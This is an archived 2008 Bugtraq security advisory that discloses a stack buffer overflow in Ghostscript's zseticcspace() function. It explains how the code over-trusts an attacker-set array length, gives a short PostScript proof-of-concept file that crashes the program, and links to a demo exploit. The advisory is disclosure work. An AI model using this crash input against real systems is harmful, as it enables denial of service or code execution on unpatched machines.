Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Ghostscript buffer overflow

from [Chris Evans] Network Security [Permanent Link]
Subject: Ghostscript buffer overflow
Date: Thu, 28 Feb 2008 14:57:42 -0800 
Hi,

Buffer overflow in Ghostscript. A useful attack vector because a lot
of UNIX workstations will put PS files on the web through Ghostscript.

The problem is a stack-based buffer overflow in the zseticcspace()
function in zicc.c. The issue is over-trust of the length of a
postscript array which an attacker can set to an arbitrary length. One
slight amusement is that the overflowed type is "float", leading to
machine code -> float conversion in any exploit. An example .ps file
to trigger a crash follows:

%!PS-Adobe-2.0
<< /DataSource currentfile /N 100 /Range [ 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 ] >> .seticcspace

Announcement:
http://scarybeastsecurity.blogspot.com/2008/02/buffer-overflow-in-ghostscript.html

Full technical details including a demo exploit by my colleague Will Drewry:
http://scary.beasts.org/security/CESA-2008-001.html

Cheers
Chris
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Ghostscript buffer overflow, Chris Evans <=
Previous by Date:  PHPMyTourney Remote file include Vulnerability, security
Next by Date:  Re: Loginwindow.app and Mac OS X, Matt Johnston
Previous by Thread:  PHPMyTourney Remote file include Vulnerability, security
Next by Thread:  Centreon <= 1.4.2.3 (index.php) Remote File Disclosure, sys-project
Indexes:  [Date] [Thread] [Top] [All Lists]